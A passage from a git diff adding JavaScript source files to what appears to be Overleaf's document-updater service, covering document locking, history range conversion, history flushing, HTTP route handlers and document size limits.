'comment not found', + info: { commentId }, + }) + } + + return { comment } + }, + + async deleteComment(projectId, docId, commentId, userId) { + const { lines, version, ranges, pathname, historyRangesSupport } = + await DocumentManager.getDoc(projectId, docId) + if (lines == null || version == null) { + throw new Errors.NotFoundError(`document not found: ${docId}`) + } + + const newRanges = RangesManager.deleteComment(commentId, ranges) + + await RedisManager.promises.updateDocument( + projectId, + docId, + lines, + version, + [], + newRanges, + {} + ) + + if (historyRangesSupport) { + await RedisManager.promises.updateCommentState(docId, commentId, false) + await ProjectHistoryRedisManager.promises.queueOps( + projectId, + JSON.stringify({ + pathname, + deleteComment: commentId, + meta: { + ts: new Date(), + user_id: userId, + }, + }) + ) + } + }, + + async renameDoc(projectId, docId, userId, update, projectHistoryId) { + await RedisManager.promises.renameDoc( + projectId, + docId, + userId, + update, + projectHistoryId + ) + }, + + async getDocAndFlushIfOld(projectId, docId) { + const { lines, version, unflushedTime, alreadyLoaded } = + await DocumentManager.getDoc(projectId, docId) + + // if doc was already loaded see if it needs to be flushed + if ( + alreadyLoaded && + unflushedTime != null && + Date.now() - unflushedTime > MAX_UNFLUSHED_AGE + ) { + await DocumentManager.flushDocIfLoaded(projectId, docId) + } + + return { lines, version } + }, + + async resyncDocContents(projectId, docId, path, opts = {}) { + logger.debug({ projectId, docId, path }, 'start resyncing doc contents') + let { + lines, + ranges, + resolvedCommentIds, + version, + projectHistoryId, + historyRangesSupport, + } = await RedisManager.promises.getDoc(projectId, docId) + + // To avoid issues where the same docId appears with different paths, + // we use the path from the resyncProjectStructure update. If we used + // the path from the getDoc call to web then the two occurences of the + // docId would map to the same path, and this would be rejected by + // project-history as an unexpected resyncDocContent update. + if (lines == null || version == null) { + logger.debug( + { projectId, docId }, + 'resyncing doc contents - not found in redis - retrieving from web' + ) + ;({ + lines, + ranges, + resolvedCommentIds, + version, + projectHistoryId, + historyRangesSupport, + } = await PersistenceManager.promises.getDoc(projectId, docId, { + peek: true, + })) + } else { + logger.debug( + { projectId, docId }, + 'resyncing doc contents - doc in redis - will queue in redis' + ) + } + + if (opts.historyRangesMigration) { + historyRangesSupport = opts.historyRangesMigration === 'forwards' + } + + await ProjectHistoryRedisManager.promises.queueResyncDocContent( + projectId, + projectHistoryId, + docId, + lines, + ranges ?? {}, + resolvedCommentIds, + version, + // use the path from the resyncProjectStructure update + path, + historyRangesSupport + ) + + if (opts.historyRangesMigration) { + await RedisManager.promises.setHistoryRangesSupportFlag( + docId, + historyRangesSupport + ) + } + }, + + async getDocWithLock(projectId, docId) { + const UpdateManager = require('./UpdateManager') + return await UpdateManager.promises.lockUpdatesAndDo( + DocumentManager.getDoc, + projectId, + docId + ) + }, + + async getCommentWithLock(projectId, docId, commentId) { + const UpdateManager = require('./UpdateManager') + return await UpdateManager.promises.lockUpdatesAndDo( + DocumentManager.getComment, + projectId, + docId, + commentId + ) + }, + + async getDocAndRecentOpsWithLock(projectId, docId, fromVersion) { + const UpdateManager = require('./UpdateManager') + return await UpdateManager.promises.lockUpdatesAndDo( + DocumentManager.getDocAndRecentOps, + projectId, + docId, + fromVersion + ) + }, + + async getDocAndFlushIfOldWithLock(projectId, docId) { + const UpdateManager = require('./UpdateManager') + return await UpdateManager.promises.lockUpdatesAndDo( + DocumentManager.getDocAndFlushIfOld, + projectId, + docId + ) + }, + + async setDocWithLock( + projectId, + docId, + lines, + source, + userId, + undoing, + external + ) { + const UpdateManager = require('./UpdateManager') + return await UpdateManager.promises.lockUpdatesAndDo( + DocumentManager.setDoc, + projectId, + docId, + lines, + source, + userId, + undoing, + external + ) + }, + + async appendToDocWithLock(projectId, docId, lines, source, userId) { + const UpdateManager = require('./UpdateManager') + return await UpdateManager.promises.lockUpdatesAndDo( + DocumentManager.appendToDoc, + projectId, + docId, + lines, + source, + userId + ) + }, + + async flushDocIfLoadedWithLock(projectId, docId) { + const UpdateManager = require('./UpdateManager') + return await UpdateManager.promises.lockUpdatesAndDo( + DocumentManager.flushDocIfLoaded, + projectId, + docId + ) + }, + + async flushAndDeleteDocWithLock(projectId, docId, options) { + const UpdateManager = require('./UpdateManager') + return await UpdateManager.promises.lockUpdatesAndDo( + DocumentManager.flushAndDeleteDoc, + projectId, + docId, + options + ) + }, + + async acceptChangesWithLock(projectId, docId, changeIds) { + const UpdateManager = require('./UpdateManager') + await UpdateManager.promises.lockUpdatesAndDo( + DocumentManager.acceptChanges, + projectId, + docId, + changeIds + ) + }, + + async updateCommentStateWithLock( + projectId, + docId, + threadId, + userId, + resolved + ) { + const UpdateManager = require('./UpdateManager') + await UpdateManager.promises.lockUpdatesAndDo( + DocumentManager.updateCommentState, + projectId, + docId, + threadId, + userId, + resolved + ) + }, + + async deleteCommentWithLock(projectId, docId, threadId, userId) { + const UpdateManager = require('./UpdateManager') + await UpdateManager.promises.lockUpdatesAndDo( + DocumentManager.deleteComment, + projectId, + docId, + threadId, + userId + ) + }, + + async renameDocWithLock(projectId, docId, userId, update, projectHistoryId) { + const UpdateManager = require('./UpdateManager') + await UpdateManager.promises.lockUpdatesAndDo( + DocumentManager.renameDoc, + projectId, + docId, + userId, + update, + projectHistoryId + ) + }, + + async resyncDocContentsWithLock(projectId, docId, path, opts) { + const UpdateManager = require('./UpdateManager') + await UpdateManager.promises.lockUpdatesAndDo( + DocumentManager.resyncDocContents, + projectId, + docId, + path, + opts + ) + }, +} + +module.exports = { + ...callbackifyAll(DocumentManager, { + multiResult: { + getDoc: [ + 'lines', + 'version', + 'ranges', + 'pathname', + 'projectHistoryId', + 'unflushedTime', + 'alreadyLoaded', + 'historyRangesSupport', + ], + getDocWithLock: [ + 'lines', + 'version', + 'ranges', + 'pathname', + 'projectHistoryId', + 'unflushedTime', + 'alreadyLoaded', + 'historyRangesSupport', + ], + getDocAndFlushIfOld: ['lines', 'version'], + getDocAndFlushIfOldWithLock: ['lines', 'version'], + getDocAndRecentOps: [ + 'lines', + 'version', + 'ops', + 'ranges', + 'pathname', + 'projectHistoryId', + ], + getDocAndRecentOpsWithLock: [ + 'lines', + 'version', + 'ops', + 'ranges', + 'pathname', + 'projectHistoryId', + ], + getCommentWithLock: ['comment'], + }, + }), + promises: DocumentManager, +} diff --git a/services/document-updater/app/js/Errors.js b/services/document-updater/app/js/Errors.js new file mode 100644 index 0000000..a43f69a --- /dev/null +++ b/services/document-updater/app/js/Errors.js @@ -0,0 +1,15 @@ +const OError = require('@overleaf/o-error') + +class NotFoundError extends OError {} +class OpRangeNotAvailableError extends OError {} +class ProjectStateChangedError extends OError {} +class DeleteMismatchError extends OError {} +class FileTooLargeError extends OError {} + +module.exports = { + NotFoundError, + OpRangeNotAvailableError, + ProjectStateChangedError, + DeleteMismatchError, + FileTooLargeError, +} diff --git a/services/document-updater/app/js/HistoryConversions.js b/services/document-updater/app/js/HistoryConversions.js new file mode 100644 index 0000000..50db911 --- /dev/null +++ b/services/document-updater/app/js/HistoryConversions.js @@ -0,0 +1,179 @@ +// @ts-check + +const _ = require('lodash') +const { isDelete } = require('./Utils') + +/** + * @import { Comment, HistoryComment, HistoryRanges, HistoryTrackedChange } from './types' + * @import { Ranges, TrackedChange } from './types' + */ + +/** + * Convert editor ranges to history ranges + * + * @param {Ranges} ranges + * @return {HistoryRanges} + */ +function toHistoryRanges(ranges) { + const changes = ranges.changes ?? [] + const comments = (ranges.comments ?? []).slice() + + // Changes are assumed to be sorted, but not comments + comments.sort((a, b) => a.op.p - b.op.p) + + /** + * This will allow us to go through comments at a different pace as we loop + * through tracked changes + */ + const commentsIterator = new CommentsIterator(comments) + + /** + * Current offset between editor pos and history pos + */ + let offset = 0 + + /** + * History comments that might overlap with the tracked change considered + * + * @type {HistoryComment[]} + */ + let pendingComments = [] + + /** + * The final history comments generated + * + * @type {HistoryComment[]} + */ + const historyComments = [] + + /** + * The final history tracked changes generated + * + * @type {HistoryTrackedChange[]} + */ + const historyChanges = [] + + for (const change of changes) { + historyChanges.push(toHistoryChange(change, offset)) + + // After this point, we're only interested in tracked deletes + if (!isDelete(change.op)) { + continue + } + + // Fill pendingComments with new comments that start before this tracked + // delete and might overlap + for (const comment of commentsIterator.nextComments(change.op.p)) { + pendingComments.push(toHistoryComment(comment, offset)) + } + + // Save comments that are fully before this tracked delete + const newPendingComments = [] + for (const historyComment of pendingComments) { + const commentEnd = historyComment.op.p + historyComment.op.c.length + if (commentEnd <= change.op.p) { + historyComments.push(historyComment) + } else { + newPendingComments.push(historyComment) + } + } + pendingComments = newPendingComments + + // The rest of pending comments overlap with this tracked change. Adjust + // their history length. + for (const historyComment of pendingComments) { + historyComment.op.hlen = + (historyComment.op.hlen ?? historyComment.op.c.length) + + change.op.d.length + } + + // Adjust the offset + offset += change.op.d.length + } + // Save the last pending comments + for (const historyComment of pendingComments) { + historyComments.push(historyComment) + } + + // Save any comments that came after the last tracked change + for (const comment of commentsIterator.nextComments()) { + historyComments.push(toHistoryComment(comment, offset)) + } + + const historyRanges = {} + if (historyComments.length > 0) { + historyRanges.comments = historyComments + } + if (historyChanges.length > 0) { + historyRanges.changes = historyChanges + } + return historyRanges +} + +class CommentsIterator { + /** + * Build a CommentsIterator + * + * @param {Comment[]} comments + */ + constructor(comments) { + this.comments = comments + this.currentIndex = 0 + } + + /** + * Generator that returns the next comments to consider + * + * @param {number} beforePos - only return comments that start before this position + * @return {Iterable<Comment>} + */ + *nextComments(beforePos = Infinity) { + while (this.currentIndex < this.comments.length) { + const comment = this.comments[this.currentIndex] + if (comment.op.p < beforePos) { + yield comment + this.currentIndex += 1 + } else { + return + } + } + } +} + +/** + * Convert an editor tracked change into a history tracked change + * + * @param {TrackedChange} change + * @param {number} offset - how much the history change is ahead of the + * editor change + * @return {HistoryTrackedChange} + */ +function toHistoryChange(change, offset) { + /** @type {HistoryTrackedChange} */ + const historyChange = _.cloneDeep(change) + if (offset > 0) { + historyChange.op.hpos = change.op.p + offset + } + return historyChange +} + +/** + * Convert an editor comment into a history comment + * + * @param {Comment} comment + * @param {number} offset - how much the history comment is ahead of the + * editor comment + * @return {HistoryComment} + */ +function toHistoryComment(comment, offset) { + /** @type {HistoryComment} */ + const historyComment = _.cloneDeep(comment) + if (offset > 0) { + historyComment.op.hpos = comment.op.p + offset + } + return historyComment +} + +module.exports = { + toHistoryRanges, +} diff --git a/services/document-updater/app/js/HistoryManager.js b/services/document-updater/app/js/HistoryManager.js new file mode 100644 index 0000000..3963431 --- /dev/null +++ b/services/document-updater/app/js/HistoryManager.js @@ -0,0 +1,143 @@ +const async = require('async') +const logger = require('@overleaf/logger') +const { promisifyAll } = require('@overleaf/promise-utils') +const request = require('request') +const Settings = require('@overleaf/settings') +const ProjectHistoryRedisManager = require('./ProjectHistoryRedisManager') +const metrics = require('./Metrics') + +const HistoryManager = { + // flush changes in the background + flushProjectChangesAsync(projectId) { + HistoryManager.flushProjectChanges( + projectId, + { background: true }, + function () {} + ) + }, + + // flush changes and callback (for when we need to know the queue is flushed) + flushProjectChanges(projectId, options, callback) { + if (callback == null) { + callback = function () {} + } + if (options.skip_history_flush) { + logger.debug({ projectId }, 'skipping flush of project history') + return callback() + } + metrics.inc('history-flush', 1, { status: 'project-history' }) + const url = `${Settings.apis.project_history.url}/project/${projectId}/flush` + const qs = {} + if (options.background) { + qs.background = true + } // pass on the background flush option if present + logger.debug({ projectId, url, qs }, 'flushing doc in project history api') + request.post({ url, qs }, function (error, res, body) { + if (error) { + logger.error({ error, projectId }, 'project history api request failed') + callback(error) + } else if (res.statusCode < 200 && res.statusCode >= 300) { + logger.error( + { projectId }, + `project history api returned a failure status code: ${res.statusCode}` + ) + callback(error) + } else { + callback() + } + }) + }, + + FLUSH_DOC_EVERY_N_OPS: 100, + FLUSH_PROJECT_EVERY_N_OPS: 500, + + recordAndFlushHistoryOps(projectId, ops, projectOpsLength) { + if (ops == null) { + ops = [] + } + if (ops.length === 0) { + return + } + + // record updates for project history + if ( + HistoryManager.shouldFlushHistoryOps( + projectOpsLength, + ops.length, + HistoryManager.FLUSH_PROJECT_EVERY_N_OPS + ) + ) { + // Do this in the background since it uses HTTP and so may be too + // slow to wait for when processing a doc update. + logger.debug( + { projectOpsLength, projectId }, + 'flushing project history api' + ) + HistoryManager.flushProjectChangesAsync(projectId) + } + }, + + shouldFlushHistoryOps(length, opsLength, threshold) { + if (!length) { + return false + } // don't flush unless we know the length + // We want to flush every 100 ops, i.e. 100, 200, 300, etc + // Find out which 'block' (i.e. 0-99, 100-199) we were in before and after pushing these + // ops. If we've changed, then we've gone over a multiple of 100 and should flush. + // (Most of the time, we will only hit 100 and then flushing will put us back to 0) + const previousLength = length - opsLength + const prevBlock = Math.floor(previousLength / threshold) + const newBlock = Math.floor(length / threshold) + return newBlock !== prevBlock + }, + + MAX_PARALLEL_REQUESTS: 4, + + resyncProjectHistory( + projectId, + projectHistoryId, + docs, + files, + opts, + callback + ) { + ProjectHistoryRedisManager.queueResyncProjectStructure( + projectId, + projectHistoryId, + docs, + files, + opts, + function (error) { + if (error) { + return callback(error) + } + if (opts.resyncProjectStructureOnly) return callback() + const DocumentManager = require('./DocumentManager') + const resyncDoc = (doc, cb) => { + DocumentManager.resyncDocContentsWithLock( + projectId, + doc.doc, + doc.path, + opts, + cb + ) + } + async.eachLimit( + docs, + HistoryManager.MAX_PARALLEL_REQUESTS, + resyncDoc, + callback + ) + } + ) + }, +} + +module.exports = HistoryManager +module.exports.promises = promisifyAll(HistoryManager, { + without: [ + 'flushProjectChangesAsync', + 'recordAndFlushHistoryOps', + 'shouldFlushHistoryOps', + ], +}) diff --git a/services/document-updater/app/js/HttpController.js b/services/document-updater/app/js/HttpController.js new file mode 100644 index 0000000..95fe9b7 --- /dev/null +++ b/services/document-updater/app/js/HttpController.js @@ -0,0 +1,559 @@ +const DocumentManager = require('./DocumentManager') +const HistoryManager = require('./HistoryManager') +const ProjectManager = require('./ProjectManager') +const RedisManager = require('./RedisManager') +const Errors = require('./Errors') +const logger = require('@overleaf/logger') +const Settings = require('@overleaf/settings') +const Metrics = require('./Metrics') +const DeleteQueueManager = require('./DeleteQueueManager') +const { getTotalSizeOfLines } = require('./Limits') +const async = require('async') + +function getDoc(req, res, next) { + let fromVersion + const docId = req.params.doc_id + const projectId = req.params.project_id + logger.debug({ projectId, docId }, 'getting doc via http') + const timer = new Metrics.Timer('http.getDoc') + + if (req.query.fromVersion != null) { + fromVersion = parseInt(req.query.fromVersion, 10) + } else { + fromVersion = -1 + } + + DocumentManager.getDocAndRecentOpsWithLock( + projectId, + docId, + fromVersion, + (error, lines, version, ops, ranges, pathname) => { + timer.done() + if (error) { + return next(error) + } + logger.debug({ projectId, docId }, 'got doc via http') + if (lines == null || version == null) { + return next(new Errors.NotFoundError('document not found')) + } + res.json({ + id: docId, + lines, + version, + ops, + ranges, + pathname, + ttlInS: RedisManager.DOC_OPS_TTL, + }) + } + ) +} + +function getComment(req, res, next) { + const docId = req.params.doc_id + const projectId = req.params.project_id + const commentId = req.params.comment_id + + logger.debug({ projectId, docId, commentId }, 'getting comment via http') + + DocumentManager.getCommentWithLock( + projectId, + docId, + commentId, + (error, comment) => { + if (error) { + return next(error) + } + if (comment == null) { + return next(new Errors.NotFoundError('comment not found')) + } + res.json(comment) + } + ) +} + +// return the doc from redis if present, but don't load it from mongo +function peekDoc(req, res, next) { + const docId = req.params.doc_id + const projectId = req.params.project_id + logger.debug({ projectId, docId }, 'peeking at doc via http') + RedisManager.getDoc(projectId, docId, function (error, lines, version) { + if (error) { + return next(error) + } + if (lines == null || version == null) { + return next(new Errors.NotFoundError('document not found')) + } + res.json({ id: docId, lines, version }) + }) +} + +function getProjectDocsAndFlushIfOld(req, res, next) { + const projectId = req.params.project_id + const projectStateHash = req.query.state + // exclude is string of existing docs "id:version,id:version,..." + const excludeItems = + req.query.exclude != null ? req.query.exclude.split(',') : [] + logger.debug({ projectId, exclude: excludeItems }, 'getting docs via http') + const timer = new Metrics.Timer('http.getAllDocs') + const excludeVersions = {} + for (const item of excludeItems) { + const [id, version] = item.split(':') + excludeVersions[id] = version + } + logger.debug( + { projectId, projectStateHash, excludeVersions }, + 'excluding versions' + ) + ProjectManager.getProjectDocsAndFlushIfOld( + projectId, + projectStateHash, + excludeVersions, + (error, result) => { + timer.done() + if (error instanceof Errors.ProjectStateChangedError) { + res.sendStatus(409) // conflict + } else if (error) { + next(error) + } else { + logger.debug( + { + projectId, + result: result.map(doc => `${doc._id}:${doc.v}`), + }, + 'got docs via http' + ) + res.send(result) + } + } + ) +} + +function getProjectLastUpdatedAt(req, res, next) { + const projectId = req.params.project_id + ProjectManager.getProjectDocsTimestamps(projectId, (err, timestamps) => { + if (err) return next(err) + + // Filter out nulls. This can happen when + // - docs get flushed between the listing and getting the individual docs ts + // - a doc flush failed half way (doc keys removed, project tracking not updated) + timestamps = timestamps.filter(ts => !!ts) + + timestamps = timestamps.map(ts => parseInt(ts, 10)) + timestamps.sort((a, b) => (a > b ? 1 : -1)) + res.json({ lastUpdatedAt: timestamps.pop() }) + }) +} + +function clearProjectState(req, res, next) { + const projectId = req.params.project_id + const timer = new Metrics.Timer('http.clearProjectState') + logger.debug({ projectId }, 'clearing project state via http') + ProjectManager.clearProjectState(projectId, error => { + timer.done() + if (error) { + next(error) + } else { + res.sendStatus(200) + } + }) +} + +function setDoc(req, res, next) { + const docId = req.params.doc_id + const projectId = req.params.project_id + const { lines, source, user_id: userId, undoing } = req.body + const lineSize = getTotalSizeOfLines(lines) + if (lineSize > Settings.max_doc_length) { + logger.warn( + { projectId, docId, source, lineSize, userId }, + 'document too large, returning 406 response' + ) + return res.sendStatus(406) + } + logger.debug( + { projectId, docId, lines, source, userId, undoing }, + 'setting doc via http' + ) + const timer = new Metrics.Timer('http.setDoc') + DocumentManager.setDocWithLock( + projectId, + docId, + lines, + source, + userId, + undoing, + true, + (error, result) => { + timer.done() + if (error) { + return next(error) + } + logger.debug({ projectId, docId }, 'set doc via http') + res.json(result) + } + ) +} + +function appendToDoc(req, res, next) { + const docId = req.params.doc_id + const projectId = req.params.project_id + const { lines, source, user_id: userId } = req.body + const timer = new Metrics.Timer('http.appendToDoc') + DocumentManager.appendToDocWithLock( + projectId, + docId, + lines, + source, + userId, + (error, result) => { + timer.done() + if (error instanceof Errors.FileTooLargeError) { + logger.warn('refusing to append to file, it would become too large') + return res.sendStatus(422) + } + if (error) { + return next(error) + } + logger.debug( + { projectId, docId, lines, source, userId }, + 'appending to doc via http' + ) + res.json(result) + } + ) +} + +function flushDocIfLoaded(req, res, next) { + const docId = req.params.doc_id + const projectId = req.params.project_id + logger.debug({ projectId, docId }, 'flushing doc via http') + const timer = new Metrics.Timer('http.flushDoc') + DocumentManager.flushDocIfLoadedWithLock(projectId, docId, error => { + timer.done() + if (error) { + return next(error) + } + logger.debug({ projectId, docId }, 'flushed doc via http') + res.sendStatus(204) // No Content + }) +} + +function deleteDoc(req, res, next) { + const docId = req.params.doc_id + const projectId = req.params.project_id + const ignoreFlushErrors = req.query.ignore_flush_errors === 'true' + const timer = new Metrics.Timer('http.deleteDoc') + logger.debug({ projectId, docId }, 'deleting doc via http') + DocumentManager.flushAndDeleteDocWithLock( + projectId, + docId, + { ignoreFlushErrors }, + error => { + timer.done() + // There is no harm in flushing project history if the previous call + // failed and sometimes it is required + HistoryManager.flushProjectChangesAsync(projectId) + + if (error) { + return next(error) + } + logger.debug({ projectId, docId }, 'deleted doc via http') + res.sendStatus(204) // No Content + } + ) +} + +function flushProject(req, res, next) { + const projectId = req.params.project_id + logger.debug({ projectId }, 'flushing project via http') + const timer = new Metrics.Timer('http.flushProject') + ProjectManager.flushProjectWithLocks(projectId, error => { + timer.done() + if (error) { + return next(error) + } + logger.debug({ projectId }, 'flushed project via http') + res.sendStatus(204) // No Content + }) +} + +function deleteProject(req, res, next) { + const projectId = req.params.project_id + logger.debug({ projectId }, 'deleting project via http') + const options = {} + if (req.query.background) { + options.background = true + } // allow non-urgent flushes to be queued + if (req.query.shutdown) { + options.skip_history_flush = true + } // don't flush history when realtime shuts down + if (req.query.background) { + ProjectManager.queueFlushAndDeleteProject(projectId, error => { + if (error) { + return next(error) + } + logger.debug({ projectId }, 'queue delete of project via http') + res.sendStatus(204) + }) // No Content + } else { + const timer = new Metrics.Timer('http.deleteProject') + ProjectManager.flushAndDeleteProjectWithLocks(projectId, options, error => { + timer.done() + if (error) { + return next(error) + } + logger.debug({ projectId }, 'deleted project via http') + res.sendStatus(204) // No Content + }) + } +} + +function deleteMultipleProjects(req, res, next) { + const projectIds = req.body.project_ids || [] + logger.debug({ projectIds }, 'deleting multiple projects via http') + async.eachSeries( + projectIds, + (projectId, cb) => { + logger.debug({ projectId }, 'queue delete of project via http') + ProjectManager.queueFlushAndDeleteProject(projectId, cb) + }, + error => { + if (error) { + return next(error) + } + res.sendStatus(204) // No Content + } + ) +} + +function acceptChanges(req, res, next) { + const { project_id: projectId, doc_id: docId } = req.params + let changeIds = req.body.change_ids + if (changeIds == null) { + changeIds = [req.params.change_id] + } + logger.debug( + { projectId, docId }, + `accepting ${changeIds.length} changes via http` + ) + const timer = new Metrics.Timer('http.acceptChanges') + DocumentManager.acceptChangesWithLock(projectId, docId, changeIds, error => { + timer.done() + if (error) { + return next(error) + } + logger.debug( + { projectId, docId }, + `accepted ${changeIds.length} changes via http` + ) + res.sendStatus(204) // No Content + }) +} + +function resolveComment(req, res, next) { + const { + project_id: projectId, + doc_id: docId, + comment_id: commentId, + } = req.params + const userId = req.body.user_id + logger.debug({ projectId, docId, commentId }, 'resolving comment via http') + DocumentManager.updateCommentStateWithLock( + projectId, + docId, + commentId, + userId, + true, + error => { + if (error) { + return next(error) + } + logger.debug({ projectId, docId, commentId }, 'resolved comment via http') + res.sendStatus(204) // No Content + } + ) +} + +function reopenComment(req, res, next) { + const { + project_id: projectId, + doc_id: docId, + comment_id: commentId, + } = req.params + const userId = req.body.user_id + logger.debug({ projectId, docId, commentId }, 'reopening comment via http') + DocumentManager.updateCommentStateWithLock( + projectId, + docId, + commentId, + userId, + false, + error => { + if (error) { + return next(error) + } + logger.debug({ projectId, docId, commentId }, 'reopened comment via http') + res.sendStatus(204) // No Content + } + ) +} + +function deleteComment(req, res, next) { + const { + project_id: projectId, + doc_id: docId, + comment_id: commentId, + } = req.params + const userId = req.body.user_id + logger.debug({ projectId, docId, commentId }, 'deleting comment via http') + const timer = new Metrics.Timer('http.deleteComment') + DocumentManager.deleteCommentWithLock( + projectId, + docId, + commentId, + userId, + error => { + timer.done() + if (error) { + return next(error) + } + logger.debug({ projectId, docId, commentId }, 'deleted comment via http') + res.sendStatus(204) // No Content + } + ) +} + +function updateProject(req, res, next) { + const timer = new Metrics.Timer('http.updateProject') + const projectId = req.params.project_id + const { projectHistoryId, userId, updates = [], version, source } = req.body + logger.debug({ projectId, updates, version }, 'updating project via http') + ProjectManager.updateProjectWithLocks( + projectId, + projectHistoryId, + userId, + updates, + version, + source, + error => { + timer.done() + if (error) { + return next(error) + } + logger.debug({ projectId }, 'updated project via http') + res.sendStatus(204) // No Content + } + ) +} + +function resyncProjectHistory(req, res, next) { + const projectId = req.params.project_id + const { + projectHistoryId, + docs, + files, + historyRangesMigration, + resyncProjectStructureOnly, + } = req.body + + logger.debug( + { projectId, docs, files }, + 'queuing project history resync via http' + ) + + const opts = {} + if (historyRangesMigration) { + opts.historyRangesMigration = historyRangesMigration + } + if (resyncProjectStructureOnly) { + opts.resyncProjectStructureOnly = resyncProjectStructureOnly + } + + HistoryManager.resyncProjectHistory( + projectId, + projectHistoryId, + docs, + files, + opts, + error => { + if (error) { + return next(error) + } + logger.debug({ projectId }, 'queued project history resync via http') + res.sendStatus(204) + } + ) +} + +function flushQueuedProjects(req, res, next) { + res.setTimeout(10 * 60 * 1000) + const options = { + limit: req.query.limit || 1000, + timeout: 5 * 60 * 1000, + min_delete_age: req.query.min_delete_age || 5 * 60 * 1000, + } + DeleteQueueManager.flushAndDeleteOldProjects(options, (err, flushed) => { + if (err) { + logger.err({ err }, 'error flushing old projects') + res.sendStatus(500) + } else { + logger.info({ flushed }, 'flush of queued projects completed') + res.send({ flushed }) + } + }) +} + +/** + * Block a project from getting loaded in docupdater + * + * The project is blocked only if it's not already loaded in docupdater. The + * response indicates whether the project has been blocked or not. + */ +function blockProject(req, res, next) { + const projectId = req.params.project_id + RedisManager.blockProject(projectId, (err, blocked) => { + if (err) { + return next(err) + } + res.json({ blocked }) + }) +} + +/** + * Unblock a project + */ +function unblockProject(req, res, next) { + const projectId = req.params.project_id + RedisManager.unblockProject(projectId, (err, wasBlocked) => { + if (err) { + return next(err) + } + res.json({ wasBlocked }) + }) +} + +module.exports = { + getDoc, + peekDoc, + getProjectDocsAndFlushIfOld, + getProjectLastUpdatedAt, + clearProjectState, + appendToDoc, + setDoc, + flushDocIfLoaded, + deleteDoc, + flushProject, + deleteProject, + deleteMultipleProjects, + acceptChanges, + resolveComment, + reopenComment, + deleteComment, + updateProject, + resyncProjectHistory, + flushQueuedProjects, + blockProject, + unblockProject, + getComment, +} diff --git a/services/document-updater/app/js/Limits.js b/services/document-updater/app/js/Limits.js new file mode 100644 index 0000000..268ccd3 --- /dev/null +++ b/services/document-updater/app/js/Limits.js @@ -0,0 +1,31 @@ +module.exports = { + // compute the total size of the document in chararacters, including newlines + getTotalSizeOfLines(lines) { + let size = 0 + for (const line of lines) { + size += line.length + 1 // include the newline + } + return size + }, + + // check whether the total size of the document in characters exceeds the + // maxDocLength. + // + // The estimated size should be an upper bound on the true size, typically + // it will be the size of the JSON.stringified array of lines. If the + // estimated size is less than the maxDocLength then we know that the total + // size of lines will also be less than maxDocLength. + docIsTooLarge(estimatedSize, lines, maxDocLength) { + if (estimatedSize <= maxDocLength) { + return false // definitely under the limit, no need to calculate the total size + } + // calculate the total size, bailing out early if the size limit is reached + let size = 0 + for (const line of lines) { + size += line.length + 1 // include the newline + if (size > maxDocLength) return true + } + // since we didn't hit the limit in the loop, the document is within the allowed length + return false + }, +} diff --git a/services/document-updater/app/js/LockManager.js b/services/document-updater/app/js/LockManager.js new file mode 100644 index 0000000..a65ab9f --- /dev/null +++ b/services/document-updater/app/js/LockManager.js @@ -0,0 +1,18 @@ +const Settings = require('@overleaf/settings') +const redis = require('@overleaf/redis-wrapper') +const rclient = redis.createClient(Settings.redis.lock) +const keys = Settings.redis.lock.key_schema +const RedisLocker = require('@overleaf/redis-wrapper/RedisLocker') + +module.exports = new RedisLocker({ + rclient, + getKey(docId) { + return keys.blockingKey({ doc_id: docId }) + }, + wrapTimeoutError(err, docId) { + err.doc_id = docId + return err + }, + metricsPrefix: 'doc', + lockTTLSeconds: Settings.redisLockTTLSeconds, +}) diff --git a/services/document-updater/app/js/LoggerSerializers.js b/services/document-updater/app/js/LoggerSerializers.js new file mode 100644 index 0000000..3aa8bfc --- /dev/null +++ b/services/document-updater/app/js/LoggerSerializers.js @@ -0,0 +1,51 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const _ = require('lodash') + +const showLength = function (thing) { + if (thing != null ? thing.length : undefined) { + return thing.length + } else { + return thing + } +} + +const showUpdateLength = function (update) { + if ((update != null ? update.op : undefined) instanceof Array) { + const copy = _.cloneDeep(update) + copy.op.forEach(function (element, index) { + if (element?.i?.length != null) { + copy.op[index].i = element.i.length + } + if (element?.d?.length != null) { + copy.op[index].d = element.d.length + } + if (element?.c?.length != null) { + return (copy.op[index].c = element.c.length) + } + }) + return copy + } else { + return update + } +} + +module.exports = { + // replace long values with their length + lines: showLength, + oldLines: showLength, + newLines: showLength, + docLines: showLength, + newDocLines: showLength, + ranges: showLength, + update: showUpdateLength, +} diff --git a/services/document-updater/app/js/Metrics.js b/services/document-updater/app/js/Metrics.js new file mode 100644 index 0000000..f0e5779 --- /dev/null +++ b/services/document-updater/app/js/Metrics.js @@ -0,0 +1,3 @@ +// TODO: This file was created by bulk-decaffeinate. +// Sanity-check the conversion and remove this comment. +module.exports = require('@overleaf/metrics') diff --git a/services/document-updater/app/js/PersistenceManager.js b/services/document-updater/app/js/PersistenceManager.js new file mode 100644 index 0000000..b08994a --- /dev/null +++ b/services/document-updater/app/js/PersistenceManager.js @@ -0,0 +1,196 @@ +const { promisify } = require('node:util') +const { promisifyMultiResult } = require('@overleaf/promise-utils') +const Settings = require('@overleaf/settings') +const Errors = require('./Errors') +const Metrics = require('./Metrics') +const logger = require('@overleaf/logger') +const request = require('requestretry').defaults({ + maxAttempts: 2, + retryDelay: 10, +}) + +// We have to be quick with HTTP calls because we're holding a lock that +// expires after 30 seconds. We can't let any errors in the rest of the stack +// hold us up, and need to bail out quickly if there is a problem. +const MAX_HTTP_REQUEST_LENGTH = 5000 // 5 seconds + +function updateMetric(method, error, response) { + // find the status, with special handling for connection timeouts + // https://github.com/request/request#timeouts + let status + if (error && error.connect === true) { + status = `${error.code} (connect)` + } else if (error) { + status = error.code + } else if (response) { + status = response.statusCode + } + + Metrics.inc(method, 1, { status }) + if (error && error.attempts > 1) { + Metrics.inc(`${method}-retries`, 1, { status: 'error' }) + } + if (response && response.attempts > 1) { + Metrics.inc(`${method}-retries`, 1, { status: 'success' }) + } +} + +function getDoc(projectId, docId, options = {}, _callback) { + const timer = new Metrics.Timer('persistenceManager.getDoc') + if (typeof options === 'function') { + _callback = options + options = {} + } + const callback = function (...args) { + timer.done() + _callback(...args) + } + + const urlPath = `/project/${projectId}/doc/${docId}` + const requestParams = { + url: `${Settings.apis.web.url}${urlPath}`, + method: 'GET', + headers: { + accept: 'application/json', 